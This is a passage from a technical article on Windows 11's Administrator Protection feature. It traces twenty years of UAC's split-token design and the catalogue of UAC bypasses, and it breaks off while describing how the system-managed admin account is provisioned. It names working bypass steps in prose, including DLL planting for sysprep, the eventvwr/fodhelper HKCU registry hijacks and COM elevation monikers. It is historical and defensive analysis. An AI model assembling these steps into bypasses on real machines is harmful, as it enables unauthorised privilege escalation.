**Administrator Protection (informally "Adminless") replaces Windows 11's split-token UAC with a separate, system-managed local user account.** The operating system creates this **System Managed Administrator Account (SMAA)** per local admin, links it to the primary admin via paired SAM attributes, and uses it to host elevated processes in a fresh logon session gated by Windows Hello. The kernel asks LSA to authenticate "a new instance of the shadow administrator" without any SMAA credential because the SMAA has none. The mechanism makes the elevation path a security boundary for the first time, with bulletin-grade fixes when it fails. Microsoft shipped it in KB5067036 on October 28, 2025, then reverted it on December 1, 2025 over an application-compatibility issue, not a security failure. This article walks the twenty-year argument that produced the design, the nine pre-GA bypasses Forshaw found and Microsoft fixed, and exactly where the new boundary still leaks.

1. Two tokens, one user, twenty years

Open an elevated console on a Windows 11 device with the registry value TypeOfAdminApprovalMode = 2 set, and run whoami /all. The user name is no longer yours. It is ADMIN_<sixteen random characters> -- a local account you never created, owned by an operating-system component you never ran, in a logon session that did not exist five seconds ago and will not exist five seconds after the console closes.

For twenty years, an elevated Windows command prompt reported the same user name as the unelevated one. The integrity level changed. The token changed. The user did not. That single architectural fact is the load-bearing premise of every UAC bypass ever published. The Vista User Account Control design from 2006 issued two tokens at logon for a member of the local Administrators group: a filtered standard-user token for everyday work, and a full admin token linked to it via the TokenLinkedToken field [@ms-uac-how-it-works]. When the user clicked Yes on a consent prompt, the Application Information service called CreateProcessAsUser with the linked token. Same user. Same profile. Same HKCU. Same logon session. Different integrity level.

Four resources stayed shared between the filtered and full tokens, and four categories of attack grew out of them. Files dropped in a writable directory the elevated process trusts. Registry values planted under HKEY_CURRENT_USER that an elevated binary reads before it consults HKEY_CLASSES_ROOT. COM elevation monikers that hand the attacker an elevated IFileOperation interface. Path-resolution overrides that redirect %SystemRoot% for a single auto-elevating process. The UACMe project [@uacme] catalogues 81 such methods, each one an attack on the shared-resource shape of Vista's split token.

Administrator Protection inverts that shape. The elevated administrator becomes a different account with a different security identifier, a different profile directory, a different NTUSER.DAT hive, a different authentication-ID LUID, and a different DOS device object directory under \Sessions\0\DosDevices\. The operating system manages the account itself. It is created on demand the first time the policy is enabled, linked to the primary admin via paired Security Account Manager attributes, used in a fresh logon session for every elevation, and the elevated token is destroyed when the process exits [@ms-developer-blog-2025, @call4cloud-osint].

The feature ships under four names -- Administrator Protection in Microsoft Learn, Adminless as the community shorthand this article uses, ShadowAdmin in the samsrv.dll engineering symbols, System Managed Administrator Account (SMAA) in the Windows Developer Blog [@ms-admin-protection, @ms-developer-blog-2025, @call4cloud-osint] -- and §6 walks each in turn. The launch arc was short: announced at Ignite 2024 by David Weston on November 19, 2024 [@bleepingcomputer-2024], surfaced earlier that fall in Insider Preview build 27718 on October 2, 2024 [@ms-insider-build-27718], shipped to stable Windows in KB5067036 on October 28, 2025 [@ms-kb5067036], and disabled on December 1, 2025 over a WebView2 application-compatibility regression [@forshaw-pz-jan2026, @ms-admin-protection].

This article walks what changed and what did not. By the end you will know exactly which UAC bypass families are dead, exactly which survive, exactly what the December 2025 revert was about, and exactly where the new boundary still leaks. The path runs through twenty years of design tradeoffs and seven years of binary-level fixes that never converged on a real boundary. It runs through nine Project Zero bypasses Microsoft fixed before shipping. It ends at a question Microsoft's own design documents do not yet answer: when the prompt is a credential gate instead of a click-through, what is left for the attacker to do?

The first thing to understand is what UAC was trying to do, and why Microsoft said for twenty years it was not a security boundary.

2. "Convenience, not boundary": UAC as Microsoft conceived it

Why did Vista ship UAC at all? For most of Windows history, every interactive logon for a member of the local Administrators group produced one full-admin token. The desktop shell ran as a full administrator. Every child process inherited those rights. The worm era of 2003 to 2005 demonstrated, repeatedly, that one process running in user context owned the whole machine. By 2006 the cost of admin-by-default had become impossible to defend [@wikipedia-uac].

The pre-Vista Limited User Account (LUA) was Microsoft's first attempt at a fix. The conceptual ancestor of the filtered token failed in practice because roughly half of the third-party application base broke under it, and the documented workaround -- RUNAS.EXE -- was operationally hostile enough that almost no one used it.

The redesign that produced UAC pivoted on a single observation. Forcing administrators to run as standard users had failed because too much software assumed admin rights. So Vista would give each admin user two identities. One would be standard-user enough to run the desktop, the browser, and the day-to-day applications without privilege. The other would carry the admin rights, and the operating system would arrange for the user to opt into it on a per-task basis.

Mark Russinovich's June 2007 article Inside Windows Vista User Account Control in TechNet Magazine [@russinovich-2007-vista] remains the canonical reference for the design. The mechanism is two tokens at logon; the integrity-level taxonomy (Low, Medium, High, System) gating object access; file-system and registry virtualisation rerouting writes by legacy apps; and Mandatory Integrity Control enforcing the no-write-up rule at the kernel-object boundary.
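The no-write-up rule can be sketched in a few lines. This is a toy model, not the kernel's access check: it assumes the only input is the integrity level of the subject and of the object, and it ignores the DACL check that still has to pass afterwards. The enum values are the RIDs of the well-known mandatory-label SIDs; `can_write` is a name invented for this sketch.

```python
from enum import IntEnum


class IntegrityLevel(IntEnum):
    # RID values of the well-known mandatory-label SIDs (S-1-16-<RID>).
    LOW = 0x1000
    MEDIUM = 0x2000
    HIGH = 0x3000
    SYSTEM = 0x4000


def can_write(subject: IntegrityLevel, target: IntegrityLevel) -> bool:
    """No-write-up: the subject must be at or above the object's level.

    Hypothetical helper for illustration; the real check also consults
    the object's DACL, which this model leaves out.
    """
    return subject >= target


if __name__ == "__main__":
    for subject in IntegrityLevel:
        allowed = [t.name for t in IntegrityLevel if can_write(subject, t)]
        print(f"{subject.name:6} may write to: {', '.join(allowed)}")
```

In this model a Medium process can write to Low and Medium objects but not to High ones, which is the property the split token relies on to keep the unelevated shell from tampering with elevated processes directly.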

Split-token model: The mechanism by which Vista UAC assigns two distinct access tokens to a single interactive logon for a member of the local Administrators group. The Local Security Authority issues both at logon: a filtered standard-user token with most privileges removed and the Administrators group marked as deny-only, and a linked full administrator token referenced from the filtered token's `TokenLinkedToken` field [@ms-uac-how-it-works].

The disclaimer that follows the design is the single most quoted sentence Russinovich ever published about UAC. The article will lift it verbatim once, because every Administrator Protection design decision falls out of its absence:

It's important to be aware that UAC elevations are conveniences and not security boundaries. -- Mark Russinovich, *Inside Windows Vista User Account Control*, TechNet Magazine, June 2007 [@russinovich-2007-vista]

This is not an accidental disclaimer. It is the canonical Microsoft classification, preserved into the Microsoft Security Servicing Criteria document [@msrc-servicing-criteria]. James Forshaw of Google Project Zero, writing in January 2026, re-states the position verbatim: "due to the way it was designed, it was quickly apparent it didn't represent a hard security boundary, and Microsoft downgraded it to a security feature" [@forshaw-pz-jan2026]. The classification is what determined what Microsoft would and would not pay attention to. A "security boundary" gets a security bulletin when an attacker crosses it. A "security feature" does not. A bypass of a boundary is a vulnerability. A bypass of a feature is a quality bug. For twenty years, UAC bypasses were quality bugs.

The two-tokens-at-logon mechanism is the shape from which the entire bypass canon grows. The twenty years of evolution that follow run along a single timeline.

timeline
title Privilege separation in Windows, NT 3.1 to Administrator Protection
1993 : NT 3.1 ships multi-user accounts and DACLs but admin-by-default desktop culture
2006 : Vista UAC introduces the split-token model and Mandatory Integrity Control
2009 : Davidson publishes the first UAC bypass; Windows 7 ships auto-elevation
2014 : hfiref0x's UACMe catalogue collects the bypass canon
2016 : enigma0x3 publishes the registry-hijack family (eventvwr, fodhelper, sdclt)
2019 : CVE-2019-1388 (consent.exe certificate dialog) is the lone UAC LPE bulletin
2024 : Insider Preview build 27718 surfaces Administrator Protection; Ignite 2024 announces it
2025 : KB5067036 ships the SMAA on stable Windows, then reverts on December 1
2026 : Forshaw's nine pre-GA bypasses all fixed; the elevation path is now a security boundary

To see why the entire bypass canon grew out of the split-token shape, the next section walks the mechanic at function-name granularity. It is the load-bearing pre-history of everything that comes after.

3. The Vista UAC split-token in detail

The mechanics at logon. The Local Security Authority Subsystem Service (LSASS) validates credentials. For a user in the local Administrators group, it constructs two tokens. The filtered token has its dangerous privileges removed and the Administrators SID marked deny-only; the full token retains them. The Token Manager wires the filtered token's TokenLinkedToken field to a handle on the full token. LSASS hands the filtered token to winlogon.exe. Winlogon launches userinit.exe. Userinit launches explorer.exe. The shell, holding the filtered token, becomes the parent process from which every user-initiated process inherits [@ms-uac-how-it-works].

TokenLinkedToken: The kernel structure that connects the filtered standard-user token to the linked full administrator token in Vista's split-token model. Querying the `TokenLinkedToken` information class through the `GetTokenInformation` API returns a handle to the linked token. A caller that holds `SeTcbPrivilege`, such as the Application Information service, receives a primary token it can pass to `CreateProcessAsUser` to launch an elevated child; a caller without that privilege receives only an identification-level impersonation copy. The same link is the structural premise of token-stealing attacks: any code path that can obtain a usable copy of the linked token, or impersonate it, bypasses the consent UI entirely [@ms-uac-how-it-works, @forshaw-pz-jan2026].

The shell shares four resources with anything launched under the full token.

The same user security identifier. Both tokens carry the same primary SID. Files, registry keys, and kernel objects that grant access to the user grant identical access to both processes.
The same %USERPROFILE% directory tree. C:\Users\<user>\ is the home of both. The Documents folder, the Downloads folder, the AppData hives, and any application-specific subdirectory belong to one user.
The same HKEY_CURRENT_USER hive. Both tokens map HKCU to the same NTUSER.DAT file. An elevated process that reads a user setting reads the value the unelevated user wrote.
The same logon-session LUID. The Locally Unique Identifier that identifies an interactive logon session is the same on both tokens. The kernel uses that LUID as a key for per-logon-session caching: the DOS device object directory at \Sessions\0\DosDevices\<LUID>, drive-letter mappings, mapped network drives, and the credential cache.
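The four shared resources can be made concrete with a small data model. The sketch below is illustrative only: `TokenView` is a hypothetical record, not a Windows structure, and the SID, paths, and LUID are made-up placeholder values. It shows that the filtered and full tokens of one split-token logon differ in integrity level and agree on everything else listed above.

```python
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class TokenView:
    """Hypothetical summary of the token properties discussed above."""
    user_sid: str
    profile_dir: str
    hkcu_hive: str
    logon_luid: int
    integrity: str


# The four resources the article names as shared under the split token.
SHARED_FIELDS = ("user_sid", "profile_dir", "hkcu_hive", "logon_luid")


def shared_resources(a: TokenView, b: TokenView) -> List[str]:
    """Return the names of the listed resources that two tokens share."""
    return [name for name in SHARED_FIELDS if getattr(a, name) == getattr(b, name)]


# Placeholder values for one administrator's split-token logon.
filtered = TokenView(
    user_sid="S-1-5-21-1111-2222-3333-1001",
    profile_dir=r"C:\Users\alice",
    hkcu_hive=r"C:\Users\alice\NTUSER.DAT",
    logon_luid=0x3E7A1,
    integrity="Medium",
)
full = TokenView(
    user_sid=filtered.user_sid,
    profile_dir=filtered.profile_dir,
    hkcu_hive=filtered.hkcu_hive,
    logon_luid=filtered.logon_luid,
    integrity="High",
)

print("shared:", shared_resources(filtered, full))
print("integrity:", filtered.integrity, "->", full.integrity)
```

Every entry the function returns is a resource the unelevated side can write and the elevated side will later read.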

The elevation pipeline. A user clicks Yes on a UAC prompt. The mechanism beneath that click runs through a chain of named function calls.

sequenceDiagram
participant User as User shell (filtered token)
participant AppInfo as appinfo.dll (Application Information service)
participant Consent as consent.exe (secure desktop)
participant LSA as LSASS
participant New as Elevated child process

User->>AppInfo: ShellExecute / CreateProcess "as admin"
AppInfo->>AppInfo: RAiLaunchAdminProcess RPC
AppInfo->>AppInfo: Read manifest requestedExecutionLevel
AppInfo->>AppInfo: Check ConsentPromptBehaviorAdmin
AppInfo->>Consent: Launch consent.exe on Winlogon desktop
Consent->>User: Show Yes / No prompt
User-->>Consent: Click Yes
Consent-->>AppInfo: Approved
AppInfo->>LSA: Resolve TokenLinkedToken handle
AppInfo->>New: CreateProcessAsUser(linked full token)
Note over New: Same SID and profile and HKCU and logon session
Note over New: Integrity level High

The prompt runs on the secure desktop, the same Winlogon-owned Winsta0\Winlogon desktop where the credential-entry dialog appears at logon, not the user's interactive Winsta0\Default desktop [@ms-uac-how-it-works]. User Interface Privilege Isolation (UIPI) blocks lower-integrity input from reaching higher-integrity windows; the secure-desktop switch is its first defence against synthetic-keystroke attacks against the prompt itself.

The secure desktop is not invulnerable. It changes the integrity-isolation context, but a process holding the filtered token can still trigger the switch (that is the whole point of clicking Yes), and code running before the switch can in principle modify the surrounding UI state. CVE-2019-1388 in late 2019 turned out to exploit a different aspect entirely -- a UI-interaction path through the consent.exe certificate-viewer dialog -- and not the secure-desktop switch itself.

Compare this to what comes next. Both tokens share four resources. Each of those resources is a category of attack waiting for a researcher to find it. The next section is the story of what happened when Microsoft tried to make UAC less annoying by silently elevating its own Microsoft-signed binaries -- and what the bypass canon did with the change.

4. Windows 7 auto-elevation and the birth of the bypass canon

A specific moment. December 2009. Leo Davidson publishes Windows 7 UAC whitelist: Code-injection Issue / Anti-Competitive API / Security Theatre on pretentiousname.com [@davidson-2009]. The title is the argument. The page itself is sprawling, contentious, and on a few key technical points exactly right. Microsoft's response, in Davidson's own words: "this is a non-issue, and ignored my offers to give them full details for several months." Microsoft Security Essentials eventually classified the binary (not the technique) as HackTool:Win32/Welevate.A and HackTool:Win64/Welevate.A; in Davidson's pointed observation, "recompiling the binaries in VS2010 means they are no longer detected" [@davidson-2009].

Davidson kept writing into his original page over the following decade. A marker buried inside the text reads "As I was typing more words into this page, this appeared in my text editor at the 10,000th word!" In March 2020 he removed the proof-of-concept binaries, noting "I got sick of the page being marked as malware, even by Google (FFS)." The prose remains the canonical first source on UAC bypasses [@davidson-2009].

What Windows 7 added, in October 2009, to fix Vista's prompt-fatigue problem [@russinovich-2009-win7]:

The autoElevate=true manifest attribute, embedded in selected Microsoft-signed Windows binaries.
An internal whitelist of Microsoft-signed binaries living under %SystemRoot%\System32.
The COM Elevation Moniker -- already shipping in Vista (BIND_OPTS3, syntax Elevation:Administrator!new:<CLSID>) -- was the activation primitive. Windows 7 extended implicit auto-elevation to qualifying COM servers whose registrations matched the new whitelist criteria, so callers such as IFileOperation, ICMLuaUtil, and IColorDataProxy could be launched elevated without a consent prompt under the Win7 model [@russinovich-2009-win7, @uacme]. The dedicated registry-curation surface, the COMAutoApprovalList (HKLM\Software\Microsoft\Windows NT\CurrentVersion\UAC\COMAutoApprovalList) that UACMe Method 49 references verbatim, did not ship in Windows 7; it was introduced seven years later in Windows 10 RS1 (build 14393, August 2016) as a Redstone-1 hardening that replaced implicit COM auto-elevation with explicit list curation [@uacme].
The default consent-prompt behaviour ConsentPromptBehaviorAdmin = 5: prompt for consent for non-Windows binaries [@russinovich-2009-win7].

Auto-elevation: The Windows 7 mechanism by which selected Microsoft-signed binaries elevate without showing the consent prompt to a user who is a member of the local Administrators group. The Application Information service consults a whitelist of signature, path, and manifest attributes; if the binary qualifies, `appinfo.dll` calls `CreateProcessAsUser` with the linked full token and no UI step at all [@russinovich-2009-win7].

COM Elevation Moniker: A COM activation syntax introduced in Windows Vista that lets an unelevated caller request an elevated instance of a COM server class. The `IBindCtx` is augmented with a `BIND_OPTS3` structure carrying a window handle to attribute the prompt to. The bind moniker `Elevation:Administrator!new:<CLSID>` causes the COM Service Control Manager to launch the server elevated. UACMe methods that target `IFileOperation`, `ICMLuaUtil`, and `IColorDataProxy` all descend from this mechanism [@russinovich-2009-win7, @uacme].
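The whitelist decision can be sketched as a three-way conjunction. This is a simplified model built only from the three attribute classes named above (signature, path, manifest); the actual checks inside `appinfo.dll` are more involved and are not reproduced here. `Binary` and `qualifies_for_auto_elevation` are names invented for this sketch, and the signature and manifest results are assumed to have been computed elsewhere.

```python
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class Binary:
    """Hypothetical summary of the attributes the whitelist looks at."""
    path: str
    microsoft_signed: bool       # assumed result of a signature check
    manifest_auto_elevate: bool  # autoElevate=true present in the manifest


TRUSTED_DIR = PureWindowsPath(r"C:\Windows\System32")


def qualifies_for_auto_elevation(binary: Binary,
                                 trusted_dir: PureWindowsPath = TRUSTED_DIR) -> bool:
    """All three attribute classes must hold; failing any one means a prompt."""
    path = PureWindowsPath(binary.path)
    # PureWindowsPath compares case-insensitively, as Windows paths do.
    in_trusted_dir = any(parent == trusted_dir for parent in path.parents)
    return binary.microsoft_signed and binary.manifest_auto_elevate and in_trusted_dir


sysprep = Binary(r"C:\Windows\System32\sysprep\sysprep.exe", True, True)
third_party = Binary(r"C:\Program Files\Vendor\setup.exe", False, True)
copied = Binary(r"C:\Users\alice\Downloads\sysprep.exe", True, True)

for candidate in (sysprep, third_party, copied):
    print(candidate.path, "->", qualifies_for_auto_elevation(candidate))
```

The point the model makes is that none of the three inputs describes what the binary will do once it is running elevated.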

Davidson's technique against the new whitelist is one paragraph of detail. Use the IFileOperation COM elevation moniker, which itself auto-elevates, to write a planted CRYPTBASE.DLL into %SystemRoot%\System32\sysprep\. The path is a writable destination from the limited token because IFileOperation runs elevated. Then launch sysprep.exe, which is auto-elevated as a Microsoft-signed binary in System32. Sysprep loads CRYPTBASE.DLL from its own directory before the system path. The attacker's DLL runs at High integrity in the elevated sysprep process [@davidson-2009, @uacme]. No prompt. The whitelist did the work.
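The load-order step is the part that turns a file write into code execution, and it can be modelled with two directories. The sketch below is a deliberate simplification: it checks only the application directory and then the system directory, and it ignores KnownDLLs, SafeDllSearchMode, and every other stage of the real loader. `resolve_dll` is a hypothetical helper, and the sets of files stand in for the file system.

```python
from pathlib import PureWindowsPath
from typing import Iterable, Optional

SYSTEM32 = r"C:\Windows\System32"
SYSPREP_DIR = r"C:\Windows\System32\sysprep"


def resolve_dll(name: str, app_dir: str, system_dir: str,
                existing: Iterable[PureWindowsPath]) -> Optional[PureWindowsPath]:
    """Return the first match, searching the application directory first."""
    present = set(existing)
    for directory in (app_dir, system_dir):
        candidate = PureWindowsPath(directory) / name
        if candidate in present:
            return candidate
    return None


# File system before and after the elevated IFileOperation copy.
clean = {PureWindowsPath(SYSTEM32) / "CRYPTBASE.DLL"}
planted = clean | {PureWindowsPath(SYSPREP_DIR) / "CRYPTBASE.DLL"}

print("before:", resolve_dll("CRYPTBASE.DLL", SYSPREP_DIR, SYSTEM32, clean))
print("after: ", resolve_dll("CRYPTBASE.DLL", SYSPREP_DIR, SYSTEM32, planted))
```

Before the copy the lookup falls through to System32; after it, the planted file in the sysprep directory wins because that directory is searched first.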

The bypass canon. Davidson's technique was the start, not the totality. The successors walked the same shape across families.

The DLL side-load family. Sysprep was the canonical instance. Subsequent variants targeted cliconfg.exe, mcx2prov.exe, migwiz.exe, and setupsqm.exe -- each an auto-elevating Microsoft binary that loaded a DLL from a writable directory before consulting the system path. Microsoft removed the auto-elevation attribute from many of these binaries over the Windows 10 1709 cycle, but did so one binary at a time [@uacme].
The registry-hijack family. Matt Nelson's August 2016 disclosure of an eventvwr.exe plus HKCU\Software\Classes\mscfile\shell\open\command bypass [@enigma0x3-2016-eventvwr] established the pattern. An auto-elevating binary consults HKEY_CURRENT_USER before HKEY_CLASSES_ROOT for a value the binary trusts to dispatch a child process. The limited user, who owns HKCU, writes whatever they want into the value. The elevated binary executes the attacker's command line. March 2017 produced sdclt.exe plus App Paths [@enigma0x3-2017-app-paths] and sdclt.exe plus IsolatedCommand [@enigma0x3-2017-sdclt]; May 2017 produced the fodhelper.exe plus ms-settings variant [@uacme]. All fileless. All generalising to any auto-elevating binary that walks HKCU before HKCR.
The COM-elevation-moniker abuse family. UACMe's Method 1 (Davidson's original IFileOperation) ages into Methods 41 (ICMLuaUtil, Oddvar Moe, via ucmCMLuaUtilShellExecMethod) and 43 (IColorDataProxy paired with ICMLuaUtil, Oddvar Moe derivative, via ucmDccwCOMMethod), each one a different COM interface that auto-elevates and exposes a method useful for arbitrary file or registry write [@uacme].
The environment-variable and path-poisoning family. Per-process %windir% or %SystemRoot% redirection via registry shims and Image File Execution Options, redirecting auto-elevating binaries to load resources from attacker-controlled directories.
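The registry-hijack family depends on one lookup rule: HKEY_CLASSES_ROOT is a merged view in which a per-user entry under HKCU\Software\Classes takes precedence over the machine-wide entry under HKLM\Software\Classes. The sketch below models that rule with two dictionaries. It is not registry code; `resolve_hkcr` is a hypothetical helper, and the command strings are illustrative placeholders rather than values read from a real system.

```python
from typing import Dict, Optional

MSC_KEY = r"mscfile\shell\open\command"


def resolve_hkcr(subkey: str,
                 hkcu_classes: Dict[str, str],
                 hklm_classes: Dict[str, str]) -> Optional[str]:
    """Merged-view lookup: the per-user entry wins when both exist."""
    if subkey in hkcu_classes:
        return hkcu_classes[subkey]
    return hklm_classes.get(subkey)


# Machine-wide registration (illustrative value).
hklm = {MSC_KEY: r'%SystemRoot%\system32\mmc.exe "%1" %*'}

# A fresh profile has no per-user override.
hkcu_clean: Dict[str, str] = {}

# The limited user owns HKCU and can write any value (placeholder path).
hkcu_hijacked = {MSC_KEY: r"C:\Users\alice\payload.exe"}

print("clean:   ", resolve_hkcr(MSC_KEY, hkcu_clean, hklm))
print("hijacked:", resolve_hkcr(MSC_KEY, hkcu_hijacked, hklm))
```

An auto-elevating binary that dispatches a child process from the resolved value runs whatever the second lookup returns, at High integrity, with no file ever dropped on disk by the elevated side.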

Key idea: The Windows 7 auto-elevation whitelist was the bypass. The day Microsoft shipped a class of binaries that could elevate silently based on signing and path, the entire problem of UAC bypass reduced to "make one of those binaries do something the attacker wants it to do." Every UACMe method that targets a Microsoft-signed binary in System32 descends from this design choice. The 81-method catalogue is not a list of separate vulnerabilities; it is one architectural mistake spreading through the binary inventory.

Enter hfiref0x's UACMe [@uacme]. The project has been on GitHub since 2014. It currently lists 81 named methods. Each entry pairs the method number with the author credit, the target binary, the technique class, and the "Fixed in" build number. The README, taken together, is the institutional memory of UAC's failure as a boundary. Forshaw's January 2026 framing is the operational summary: "A good repository of known bypasses is the UACMe tool which currently lists 81 separate techniques for gaining administrator privileges" [@forshaw-pz-jan2026].

Microsoft chose to fix individual bypasses rather than redesign the model. The next section asks whether seven years of fixes ever caught up.

5. 2017-2024: incremental hardening, no convergence

The middle Windows 10 era was the moment Microsoft treated UAC bypasses as a quality problem and shipped fixes at quality-fix cadence, not security-bulletin cadence. The work was real, but it was always one binary or one interface at a time.

The named milestones, kept short.

Windows 10 1709 (October 2017). Beginning with this build, IFileOperation auto-elevation for callers other than Explorer was restricted [@uacme]. The originating Davidson 2009 family of bypasses, against the sysprep + planted-CRYPTBASE shape, ceased to function for processes other than the shell itself.
Tighter appinfo.dll manifest parsing across multiple Windows 10 builds. Stricter binary-signature checks. Stricter path checks. Stricter manifest checks. Each of these closed individual bypass methods; none of them closed a family.
Per-binary hardening recorded in UACMe's "Fixed in" column. UACMe version 3.5.0 retired roughly eighty percent of the 2014-vintage catalogue as obsolete; the v3.2.x branch retains the full historical record. The project's README warns that "since version 3.5.0, all previously 'fixed' methods are considered obsolete and have been removed. If you need them, use v3.2.x branch" [@uacme].
CVE-2019-1388 (November 2019; reporter: Eduardo Braun Prado via Trend Micro's Zero Day Initiative). The lone departure from the "UAC bypasses get no CVE" rule. A UI-interaction path through consent.exe's certificate-viewer dialog: an unsigned application could trigger consent.exe to display a certificate dialog whose "View Certificate" link launched Internet Explorer running as NT AUTHORITY\SYSTEM, and IE's File menu opened cmd.exe at the same integrity level [@nvd-cve-2019-1388]. Microsoft fixed it on the November 2019 Patch Tuesday and gave it an LPE bulletin.

CVE-2019-1388 was a prompt-UI bug -- specifically, a UI-interaction path that surfaced an IE process running as SYSTEM via the certificate viewer -- not a UAC-bypass bug in the categorical sense. The classification distinction matters: Microsoft did not change its position that UAC was not a boundary; the bulletin treated this as a separate UI defect that happened to hand an unprivileged user a SYSTEM process. CISA later added the CVE to the Known Exploited Vulnerabilities Catalog [@nvd-cve-2019-1388].

The accumulating evidence by 2024 was three observations.

UACMe's catalogue has grown from its 2014 origins to 81 methods today [@uacme]. Each family of attack survived the individual fixes. As Davidson predicted in 2009, the auto-elevation whitelist was the structural problem; patching each whitelisted binary as a separate bug was a treadmill, not a convergence.

Microsoft's own Security Servicing Criteria continued to classify UAC as a security feature, not a boundary, throughout the period [@msrc-servicing-criteria, @forshaw-pz-jan2026]. The decision was load-bearing. Fixing the elevation pipeline at quality cadence meant accepting that bypasses would appear quarterly and would not appear in the Patch Tuesday bulletins until the day Microsoft changed its mind about the classification.

The third piece of evidence is what the attackers were doing while the defenders were churning the binary list. Microsoft's own number, quoted by the Windows Developer Blog from the Microsoft Digital Defense Report 2024, is 39,000 token-theft incidents per day [@ms-developer-blog-2025]. A token, once stolen from an elevated process, requires no further bypass: it is a bearer credential good for the lifetime of the logon session. The same logon session is the one the unelevated user and the elevated process share under the split-token model. The "one logon session" property of UAC's design is the structural premise that token theft depends on.

One further thread is worth naming here. Forshaw's broader 2022 Kerberos work on user-credential delegation survives the elevation-redesign question entirely. The May 2022 post Exploiting RBCD using a normal user account [@forshaw-2022-rbcd] is the representative artifact. Network-credential delegation primitives -- Resource-Based Constrained Delegation, User-to-User Kerberos, S4U2Self -- operate at a layer beneath token-level elevation, and survive even a perfect SMAA design because they do not run through the elevation path at all.

Piecewise fixes never converged on a boundary. The question that drove the next five years of Microsoft work was the obvious one: if the issue is the shared-resource model itself, what is the smallest plausible change that fixes it?

6. The breakthrough: the System Managed Administrator Account

The load-bearing design decision is one sentence. Stop trying to make one user account play both roles. The elevated administrator should be a different account with a different SID, a different profile, a different HKCU, a different logon session, and a different DOS device object directory -- and the operating system should manage that account itself.

What is striking about the design is how prosaic the underlying mechanism is. Multi-user accounts have shipped with Windows NT since version 3.1 in 1993. The architecture for running an elevated process under a separate local user has been present in NT for thirty-three years. What changed is that Microsoft finally chose to enforce the multi-user model for privilege separation, by making the operating system itself create and manage the second account, link it to the primary admin via paired Security Account Manager attributes, and use it for every elevation. The sophistication is in linkage, in lifecycle, and in removing auto-elevation, not in any single new primitive.

Note: The thing that changes between UAC and Administrator Protection is not the elevation mechanism (a manifest, a prompt, a CreateProcessAsUser call) but the elevation classification. An elevation bypass used to be a quality bug. It is now a security-bulletin vulnerability. Every Administrator Protection design decision -- separate account, fresh logon session, removed auto-elevation, Hello-gated consent -- is a consequence of the classification change.

The names. Microsoft Learn's term is Administrator Protection [@ms-admin-protection]. Microsoft's announcement material at Ignite 2024 and in the Insider Preview build 27718 post uses the same "Administrator Protection" label [@ms-insider-build-27718]; Adminless is the community shorthand that stuck. The internal engineering term in samsrv.dll (the Security Account Manager service DLL) is ShadowAdmin [@call4cloud-osint]. The Windows Developer Blog's canonical term for the underlying entity is the System Managed Administrator Account (SMAA) [@ms-developer-blog-2025].

System Managed Administrator Account (SMAA): The hidden local user account that Windows creates per primary administrator when the `TypeOfAdminApprovalMode` policy is set to 2. The SMAA has its own random user name (typically `ADMIN_<random>`), its own SID, its own profile directory under `C:\Users\ADMIN_<random>\`, its own `NTUSER.DAT` and therefore its own `HKCU`, and its own membership in the local Administrators group. The operating system uses it to host elevated processes; the user never logs into it directly [@ms-developer-blog-2025, @call4cloud-osint].

The SMAA lifecycle. Four beats. Each anchored to a verified source.

Provisioning. When TypeOfAdminApprovalMode = 2 is set under HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System (either by Group Policy or by the Intune Settings Catalog), samsrv.dll's ShadowAdminAccount::CreateShadowAdminAccount runs once per existing local-administrator account. CreateRandomShadowAdminAccountName produces an ADMIN_<random> name. AddAccountToLocalAdministratorsGroup adds the new account to the Administrators group. Accounts managed by Windows LAPS (Local Administrator Password Solution) are skipped; their lifecycle is owned by a different subsystem and Microsoft did not want the SMAA mechanism to fight LAPS rotation [@call4cloud-osint].

Linking. Two paired SAM attributes encode the trust relationship between the two accounts. The primary admin's user record gets a ShadowAccountForwardLinkSid attribute pointing at the SMAA's SID. The SMAA's user record gets a ShadowAccountBackLinkSid attribute pointing back at the primary admin. These two attributes are the only structural relationship between the two accounts; everything else -- profile, HKCU, group memberships -- is independent [@call4cloud-osint].
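The two attributes form a pair of pointers that must agree, which is the property the linkage check in §7 relies on. The following is a minimal sketch of that shape, not the SAM API: the record layout, the `resolveLinkedSmaa` helper, and the sample SIDs are hypothetical, and only the two attribute names come from the text.

```javascript
// Toy model of the two SAM link attributes. The record layout, the helper
// name, and the SIDs are hypothetical; only the attribute names are from the text.
const samRecords = new Map([
  ["S-1-5-21-1-2-3-1001", { name: "alice", ShadowAccountForwardLinkSid: "S-1-5-21-1-2-3-1051" }],
  ["S-1-5-21-1-2-3-1051", { name: "ADMIN_example", ShadowAccountBackLinkSid: "S-1-5-21-1-2-3-1001" }],
  // A record whose forward link is not reciprocated by the target account.
  ["S-1-5-21-1-2-3-1002", { name: "bob", ShadowAccountForwardLinkSid: "S-1-5-21-1-2-3-1051" }],
]);

// Returns the SMAA SID only when the forward and back links point at each other.
function resolveLinkedSmaa(records, primarySid) {
  const primary = records.get(primarySid);
  const smaaSid = primary ? primary.ShadowAccountForwardLinkSid : undefined;
  if (!smaaSid) return null;
  const smaa = records.get(smaaSid);
  return smaa && smaa.ShadowAccountBackLinkSid === primarySid ? smaaSid : null;
}

console.log(resolveLinkedSmaa(samRecords, "S-1-5-21-1-2-3-1001"));
console.log(resolveLinkedSmaa(samRecords, "S-1-5-21-1-2-3-1002"));
```

The second lookup is the interesting one: a forward link alone is not enough in this model, because the target record does not point back at the caller.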

ShadowAccountForwardLinkSid / ShadowAccountBackLinkSid. Two paired SAM-database attributes that encode the trust relationship between a primary admin user and its System Managed Administrator Account. The forward link sits on the primary admin's record and points at the SMAA's SID. The back link sits on the SMAA's record and points back at the primary admin. The Application Information service uses the forward link at elevation time to resolve which SMAA to launch the elevated process under [@call4cloud-osint].

TypeOfAdminApprovalMode. The registry value under `HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System` that selects the elevation policy. Value 0 disables UAC. Value 1 selects classic Admin Approval Mode (the Vista / Win7 / Win10 split-token behaviour). Value 2 selects Admin Approval Mode with Administrator Protection: every elevation routes through the SMAA path. The value is set by Group Policy ("User Account Control: Configure type of Admin Approval Mode") or by an Intune Settings Catalog policy and requires a reboot to take effect [@ms-admin-protection, @call4cloud-osint].

